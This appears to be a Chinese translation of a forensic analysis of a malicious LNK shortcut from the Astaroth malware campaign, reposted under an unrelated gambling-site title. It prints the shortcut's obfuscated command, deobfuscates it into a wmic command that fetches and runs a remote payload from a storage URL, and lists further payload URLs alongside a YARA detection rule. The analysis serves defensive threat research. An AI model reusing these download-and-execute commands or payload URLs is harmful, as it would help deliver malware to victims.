ink是什么文件(ink是什么文件)-pp电子娱乐官网

恶意lnk(快捷方式)文件通常是电子调查和取证的重点。从攻击者的角度来看，一个容量很小的文件不仅可以直接进行各种攻击，还可以引入其他恶意软件；从防御者的角度来看，其中包含的信息对于攻击后的追踪分析非常有用。关于攻击者制作的恶意lnk文件，米特雷特& ck将其描述为“快捷方式修改”(t1023)，总结如下:

快捷方式是一种引用其他文件或程序的通用方法，在系统启动或用户单击它时，就会打开或执行其他文件。攻击者可以通过快捷方式部署他们的持久性攻击工具。他们可能会创建一个新的快捷方式关联到某个恶意软件，同时把它伪装成一个合法的程序。或者攻击者也可以编辑已存在快捷方式的目标路径，这样受害者就会在不知不觉中运行恶意软件。

2019年7月8日，微软发布的一篇博文详细描述了一种名为astaroth的恶意软件攻击。在本文中，我将对本次活动中名为certidao.htm.lnk的恶意lnk文件进行分析，看看我能从中获得什么有用的信息。你可以从混合分析中看到相关信息。(sha 256:82942 e 3356 e6d 3017 e 4952491 d2 a6 d8 ce 5748 cfd 15387 b 5b aaf 45 a3 cb 6 cf 35a)

首先，让我们看看文件属性:

从上面可以看出，这里的“目标”(通常是一个文件引用)是一段代码，一旦快捷方式被点击，代码就会运行。另外，“评论”看起来就是一堆胡言乱语。

接下来，我们使用lecmd提取这个快捷方式的内部信息:

— header — target created: 2010-11-21 03:24:03 target modified: 2010-11-21 03:24:03 target accessed: 2010-11-21 03:24:03 file size: 302,592 flags: hastargetidlist, haslinkinfo, hasname, hasarguments, hasiconlocation, isunicode, hasexpstring file attributes: fileattributearchive icon index: 64 show window: swshowminnoactive (display the window as minimized without activating it.)name: zvvvje4d5777hiqt2369aieflhknncxmvbvjhsj2567hgeet286daufflhrnccmxbbrh2j2667lguet986ddaufihjrnnmmxbihsjj466lgukk980ddwyiihjrbmcxarguments: /v /c “set x=c77jhd2766:\\77jhd2766w77jhd2766i77jhd2766nd77jhd2766ow77jhd2766s\\s77jhd2766ys77jhd2766te77jhd2766m377jhd2766277jhd2766\\77jhd2766w77jhd2766b77jhd2766e77jhd2766m\\w77jhd2766m77jhd2766i77jhd2766c.e77jhd2766x77jhd2766e o77jhd2766s g77jhd2766e77jhd2766t uf77jhd2766h77jhd2766k77jhd2766m77jhd2766xi77jhd2766h277jhd2766, fre77jhd2766evi77jhd2766r77jhd2766t77jhd2766u77jhd2766a77jhd2766l77jhd2766me77jhd2766mo77jhd2766ry77jhd2766 /77jhd2766fo77jhd2766rm77jhd2766at:”h77jhd2766t77jhd2766t77jhd2766p77jhd2766s77jhd2766:77jhd2766/77jhd2766/st77jhd2766o77jhd2766r77jhd2766ag77jhd2766e.77jhd2766go77jhd2766og77jhd2766lea77jhd2766pis77jhd2766.co77jhd2766m77jhd2766/77jhd2766a77jhd2766w77jhd2766s77jhd2766d77jhd2766x/77jhd27660977jhd2766/v77jhd2766.t77jhd2766xt77jhd2766#0277jhd276650177jhd27664q277jhd2766977jhd2766i77jhd2766s77jhd2766q77jhd2766c77jhd2766z77jhd2766v” &&echo %x:77jhd2766=%|%comspec%”icon location: %systemroot%\system32\imageres.dll— link information —flags: volumeidandlocalba sepath>>volume information drive type: fixed storage media (hard drive) serial number: 086f96af label: (no label) local path: c:\windows\system32\cmd.exe— target id information (format: type ==> value) — absolute path: my computer\c:\windows\system32\cmd.exe -root folder: guid ==> my computer -drive letter ==> c: -directory ==> windowsshort name: windowodified: 2019-04-30 20:34:24extension block count: 1——— block 0 (beef0004) ———long name: windowscreated: 2009-07-14 03:20:10last access: 2019-04-30 20:34:24mft entry/sequence #: 671/1 (0x29f/0x1) -directory ==> system32short name: system32modified: 2019-04-30 18:45:08extension block count: 1——— block 0 (beef0004) ———long name: system32created: 2009-07-14 03:20:12last access: 2019-04-30 18:45:08mft entry/sequence #: 2549/1 (0x9f5/0x1) -file ==> cmd.exeshort name: cmd.exemodified: 2010-11-21 03:24:04extension block count: 1——— block 0 (beef0004) ———long name: cmd.execreated: 2010-11-21 03:24:04last access: 2010-11-21 03:24:04mft entry/sequence #: 20227/1 (0x4f03/0x1)— end target id information —— extra blocks information —>> environment variable data block environment variables: %comspec%>> special folder data block special folder id: 37>> known folder data block known folder guid: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> system32>> property store data block (format: guid\id description ==> value) 46588ae2-4cbc-4338-bbfc-139326986dce\4 sid ==> s-1-5-21-814163198-2266970693-1875007973-1002>> tracker databa se block machine id: dedicado-web mac address: 00:26:b9:fd:e1:82 mac vendor: dell creation: 2019-03-21 04:28:56 volume droid: 8c78ff20-8b31-44de-bbba-eabca30a81ea volume droid birth: 8c78ff20-8b31-44de-bbba-eabca30a81ea file droid: d73dcd41-4b91-11e9-8dc8-0026b9fde182 file droid birth: d73dcd41-4b91-11e9-8dc8-0026b9fde182

我们可以从上面的“海量”输出中看到很多有用的信息。其中，arguments选项明显是混淆的恶意代码，所以我们可以删除77jhd2766，得到如下命令:

arguments: /v /c “set x=c:\\windows\\system32\\wbem\\wmic.exe os get ufhkmxih2, freevirtualmemory /format:”https://storage.googleapis.com/awsdx/09/v.txt#025014q29isqczv” &&echo %x:=%|%comspec%”

其中wmic.exe被用来执行存储在谷歌服务器上的文件。

硬件信息

除了上述攻击者想要执行的攻击命令之外，这个lnk文件还包含攻击者机器的物理信息:

序列号:086f96af机器id:dedicado-webmac地址:00:26:b9:fd:e1:82mac供应商:dell

在上述攻击者使用的机器的硬件信息中，除了机器的厂商和mac地址之外，还有一个netbios名称dedicado-web值得关注。

在我们用谷歌搜索“dedicado-web”并排除无关信息后，我发现它与巴西知名主机提供商ovh有关。这也符合阿斯塔罗特袭击主要针对巴西的事实。

让我们把注意力转向其他数据。使用lnk文件中的其他数据项，结合我刚刚学到的yara规则(yara是一个开源工具，旨在帮助恶意软件研究人员识别和分类恶意软件样本。使用yara可以创建基于文本或二进制模式的恶意软件家族描述信息，当然也可以是其他匹配信息。——freebuf)，我可以尝试确定这些“软件标记”是否在之前的恶意软件中出现过。yara规则如下:

rule astaroth{ meta: author = “@mattnotmax” date = “2019-07-15” description = “lnk file with a unique mac address or netbios name in relation to a astaroth campaign” reference = “https://www.microsoft.com/security/blog/2019/07/08/diantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/” sample = “82942e3356e6d3017e4952491d2a6d8ce5748cfd15387b5bcaaf45a3cb6cf35a” strings: $mac = {00 26 b9 fd e1 82} $netbios = “dedicado-web” fullword ascii condition: uint16(0) == 0x4c and ($mac or $netbios)}

通过对hybrid-ysis(virus total for the poor)的搜索，我找到了22个结果，其中21个共享样本，上传时间为2019年4月24日至2019年6月11日。

其中一些标记为#banload或#apt，因此可能不相关。让我们使用lecmd再次处理它们，看看最终的结果:

从上图可以看出，这些恶意文件的构成非常相似，命令代码的混乱程度也差不多。然后我用cyberchef(开源数据分析工具)和正则表达式过滤得到的结果，从数据中提取相关的url:

[{“op”:”fork”,”args”:[“\\n”,”\\n”,true]},{“op”:”register”,”args”:[“(?<=echo %x:)(.*)(?=\\=)”,true,false,false]},{“op”:”find / replace”,”args”:[{“option”:”regex”,”string”:”$r0″},””,true,false,true,false]},{“op”:”find / replace”,”args”:[{“option”:”simple string”,”string”:”[]”},””,true,false,true,false]},{“op”:”extract urls”,”args”:[false]},{“op”:”defang url”,”args”:[true,true,false,”everything”]},{“op”:”remove whitespace”,”args”:[true,true,true,true,true,false]}]

结果如下:

hxxp://storage[.]googleapis[.]com/midgoldem/09/v[.]txt#025040xiuj6rl9dhxxp://storage[.]googleapis[.]com/midgoldem/09/v[.]txt#025070xbhj6luk0hxxp://storage[.]googleapis[.]com/xmoabx/04/v[.]txt#025051ijrmxxmirhxxp://e8auhrmmr[.]intelcore-i1[.]website:25/9/?13825xmuj8lukhxxp://storage[.]googleapis[.]com/midgoldem/06/v[.]txt#025038knmbj2257hxxps://storage[.]googleapis[.]com/awsdx/09/v[.]txt#025050nmble0auhhxxps://storage[.]googleapis[.]com/ultramaker/09/v[.]txt#025010bvrhj267lhxxps://storage[.]googleapis[.]com/ultramaker/09/v[.]txt#025060xjuf7hrl3hxxps://storage[.]googleapis[.]com/ultramaker/09/v[.]txt#025060aiuihkrnchxxp://storage[.]googleapis[.]com/kodesca/08/v[.]txt#025028jd3isnxvjhxxps://storage[.]googleapis[.]com/awsdx/09/v[.]txt#025014q29isqczvhxxps://storage[.]googleapis[.]com/ultramaker/08/v[.]txt#025018ef7hil69ihxxps://storage[.]googleapis[.]com/awsdx/09/v[.]txt#025060jsf7il36hhxxp://storage[.]googleapis[.]com/teslaasth/09/v[.]txt#025050elkqxmvjdhxxps://storage[.]googleapis[.]com/awsdx/09/v[.]txt#0250800uhbcbrs4hxxp://storage[.]googleapis[.]com/kodesca/09/v[.]txt#025091e6uhrcxvshxxp://q39esqczv[.]intelcore-i5[.]site:25020/09/?138025020qixvj22hhxxps://storage[.]googleapis[.]com/ultramaker/06/v[.]txt#0250906uk8dwuijhxxp://storage[.]googleapis[.]com/kodesca/04/v[.]txt#025058il39elvmdhxxp://storage[.]googleapis[.]com/kodesca/06/v[.]txt#025022e986ijrmchxxp://storage[.]googleapis[.]com/midgoldem/06/v[.]txt#025055rmxvs26ge

以上所有的分析都只是我短暂时间的结果。你可以编写更完善的yara规则，捕捉更复杂更恶意的软件。此外，我们还可以看到，lnk文件中的许多元数据也可以帮助我们定位攻击者。

如果你有什么看法，想和我交流，你可以通过matt@bitofhex.com联系我。感谢您的阅读！

本文由白帽交易所整理翻译，不代表白帽交易所任何观点和立场。

资料来源:https://nosec.org/home/detail/2807.html

原文:https://bitofhex . com/2019/07/15/derivative-intelligence-from-lnk-files/

百会从事信息安全，专注于安全大数据和企业威胁情报。

公司:fofa-互联网空安全搜索引擎，foeye-互联网空安全信息平台。

为您提供:网络空映射、企业资产收集、企业威胁情报和应急响应服务。